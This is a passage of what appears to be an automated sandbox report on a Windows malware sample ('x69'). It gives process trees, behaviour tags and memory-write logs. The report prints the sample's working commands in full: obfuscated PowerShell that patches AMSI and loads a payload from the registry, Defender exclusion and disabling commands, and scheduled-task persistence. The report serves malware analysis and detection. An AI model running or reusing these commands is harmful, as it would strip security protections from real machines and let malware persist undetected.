to memory of 640 4844 x69Disable-winDefender.exe 117 PID 4844 wrote to memory of 640 4844 x69Disable-winDefender.exe 117 PID 4844 wrote to memory of 640 4844 x69Disable-winDefender.exe 117 PID 5740 wrote to memory of 5072 5740 x69Disable-winDefender.exe 118 PID 5740 wrote to memory of 5072 5740 x69Disable-winDefender.exe 118 PID 4844 wrote to memory of 3852 4844 x69Disable-winDefender.exe 119 PID 4844 wrote to memory of 3852 4844 x69Disable-winDefender.exe 119 PID 5072 wrote to memory of 2168 5072 cmd.exe 123 PID 5072 wrote to memory of 2168 5072 cmd.exe 123 PID 3852 wrote to memory of 4852 3852 cmd.exe 124 PID 3852 wrote to memory of 4852 3852 cmd.exe 124 PID 5408 wrote to memory of 5584 5408 250519-z3llfszks4.exe 175 PID 5408 wrote to memory of 5584 5408 250519-z3llfszks4.exe 175 PID 5072 wrote to memory of 5452 5072 cmd.exe 127 PID 5072 wrote to memory of 5452 5072 cmd.exe 127 PID 5408 wrote to memory of 4588 5408 250519-z3llfszks4.exe 129 PID 5408 wrote to memory of 4588 5408 250519-z3llfszks4.exe 129 PID 5408 wrote to memory of 4588 5408 250519-z3llfszks4.exe 129 PID 4588 wrote to memory of 4472 4588 x69install.exe 131 PID 4588 wrote to memory of 4472 4588 x69install.exe 131 PID 4588 wrote to memory of 4472 4588 x69install.exe 131 PID 3852 wrote to memory of 3720 3852 cmd.exe 132 PID 3852 wrote to memory of 3720 3852 cmd.exe 132 PID 920 wrote to memory of 2356 920 cmd.exe 134 PID 920 wrote to memory of 2356 920 cmd.exe 134 PID 920 wrote to memory of 2356 920 cmd.exe 134 PID 5072 wrote to memory of 4704 5072 cmd.exe 137 PID 5072 wrote to memory of 4704 5072 cmd.exe 137 PID 3852 wrote to memory of 3700 3852 cmd.exe 138 PID 3852 wrote to memory of 3700 3852 cmd.exe 138 PID 1008 wrote to memory of 2508 1008 x69.exe 141 PID 1008 wrote to memory of 2508 1008 x69.exe 141 PID 3852 wrote to memory of 1276 3852 cmd.exe 143 PID 3852 wrote to memory of 1276 3852 cmd.exe 143 PID 5072 wrote to memory of 5244 5072 cmd.exe 144 PID 5072 wrote to memory of 5244 5072 cmd.exe 144 PID 1008 wrote to memory of 5888 1008 x69.exe 145 PID 1008 wrote to memory of 5888 1008 x69.exe 145 PID 3852 wrote to memory of 2896 3852 cmd.exe 205 PID 3852 wrote to memory of 2896 3852 cmd.exe 205 PID 5072 wrote to memory of 1596 5072 cmd.exe 218 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f4272139-aacd-4eb0-abeb-3e41dc01529c}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{4caa7d59-2c60-49b6-8c4e-9ee1e261b434}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1060
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1196 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XCSObrhMeeUn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SapZSXApSQnrTi,[Parameter(Position=1)][Type]$AXluPOHCfj)$CkvqYvcfzUz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+''+'e'+'c'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+'yM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+'b'+'l'+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CkvqYvcfzUz.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'pec'+[Char](105)+''+'a'+'l'+[Char](78)+'a'+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$SapZSXApSQnrTi).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$CkvqYvcfzUz.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+'k'+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+'S'+[Char](105)+'g,'+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+'t'+''+'u'+''+'a'+'l',$AXluPOHCfj,$SapZSXApSQnrTi).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+'e,'+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $CkvqYvcfzUz.CreateType();}$sjdZEOUNECYEv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+'2'+''+[Char](46)+''+[Char](85)+'n'+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+'s');$THiMqbLdIIHaor=$sjdZEOUNECYEv.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YaZdFpGSsHHOGhbMcyV=XCSObrhMeeUn @([String])([IntPtr]);$suxPoEWZUqxVzFzRoNBuug=XCSObrhMeeUn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pfJAWDkfzYl=$sjdZEOUNECYEv.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+'a'+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+'2'+'.'+'dl'+[Char](108)+'')));$maqyCpVvRCihqS=$THiMqbLdIIHaor.Invoke($Null,@([Object]$pfJAWDkfzYl,[Object](''+[Char](76)+''+'o'+''+'a'+''+'d'+'Li'+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$hxXUZdrWInlLHMJfp=$THiMqbLdIIHaor.Invoke($Null,@([Object]$pfJAWDkfzYl,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l'+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$vASedcL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($maqyCpVvRCihqS,$YaZdFpGSsHHOGhbMcyV).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+'ll');$VtnUpISSTDJzQCDtN=$THiMqbLdIIHaor.Invoke($Null,@([Object]$vASedcL,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'iSca'+'n'+'B'+'u'+''+'f'+'fe'+[Char](114)+'')));$hshDbGxLox=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxXUZdrWInlLHMJfp,$suxPoEWZUqxVzFzRoNBuug).Invoke($VtnUpISSTDJzQCDtN,[uint32]8,4,[ref]$hshDbGxLox);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VtnUpISSTDJzQCDtN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxXUZdrWInlLHMJfp,$suxPoEWZUqxVzFzRoNBuug).Invoke($VtnUpISSTDJzQCDtN,[uint32]8,0x20,[ref]$hshDbGxLox);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+'E'+'').GetValue(''+'x'+''+'6'+''+[Char](57)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:936
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cFXuWiIZaHuV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$eQAPyQEdrnOwzb,[Parameter(Position=1)][Type]$guBhPbZNND)$ocobqWggrjF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oCl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ocobqWggrjF.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$eQAPyQEdrnOwzb).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+'M'+[Char](97)+'na'+[Char](103)+'e'+[Char](100)+'');$ocobqWggrjF.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+'e','Pu'+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+'wS'+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$guBhPbZNND,$eQAPyQEdrnOwzb).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ocobqWggrjF.CreateType();}$EZRJZXMFBeDOk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+'m'+[Char](46)+''+'d'+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+'2'+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+'f'+'e'+''+'N'+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$yBnboBprzjikYQ=$EZRJZXMFBeDOk.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VPGvYHGxnYzvifaRDgT=cFXuWiIZaHuV @([String])([IntPtr]);$RsnhTsiqQuHZRuAbXoZkWV=cFXuWiIZaHuV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mRPwSxwZAFc=$EZRJZXMFBeDOk.GetMethod('G'+'e'+''+[Char](116)+''+'M'+'o'+'d'+'u'+'l'+''+[Char](101)+''+[Char](72)+'a'+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'rn'+'e'+''+[Char](108)+'3'+'2'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')));$WaBoPsgGDqJkpS=$yBnboBprzjikYQ.Invoke($Null,@([Object]$mRPwSxwZAFc,[Object](''+[Char](76)+''+'o'+'adL'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$MDnjkVAOZpiPdPyIh=$yBnboBprzjikYQ.Invoke($Null,@([Object]$mRPwSxwZAFc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$qJnGHSp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaBoPsgGDqJkpS,$VPGvYHGxnYzvifaRDgT).Invoke(''+'a'+''+'m'+'si.d'+[Char](108)+''+'l'+'');$jFoarKIuYfnXyuXWB=$yBnboBprzjikYQ.Invoke($Null,@([Object]$qJnGHSp,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+'a'+[Char](110)+'Buf'+'f'+''+[Char](101)+''+'r'+'')));$InwTbBCCVQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MDnjkVAOZpiPdPyIh,$RsnhTsiqQuHZRuAbXoZkWV).Invoke($jFoarKIuYfnXyuXWB,[uint32]8,4,[ref]$InwTbBCCVQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jFoarKIuYfnXyuXWB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MDnjkVAOZpiPdPyIh,$RsnhTsiqQuHZRuAbXoZkWV).Invoke($jFoarKIuYfnXyuXWB,[uint32]8,0x20,[ref]$InwTbBCCVQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](120)+''+[Char](54)+'9'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5232 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2624
-
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:2076
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:2132
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1552
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2496
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1616
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1128
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2752
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2800
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2992
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3436
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"C:\Users\Admin\AppData\Local\Temp\250519-z3llfszks4.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:516
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3996
-
-
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5740 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2700 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\396d7b93.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3964
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\923E.tmp\923E.tmp\924F.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
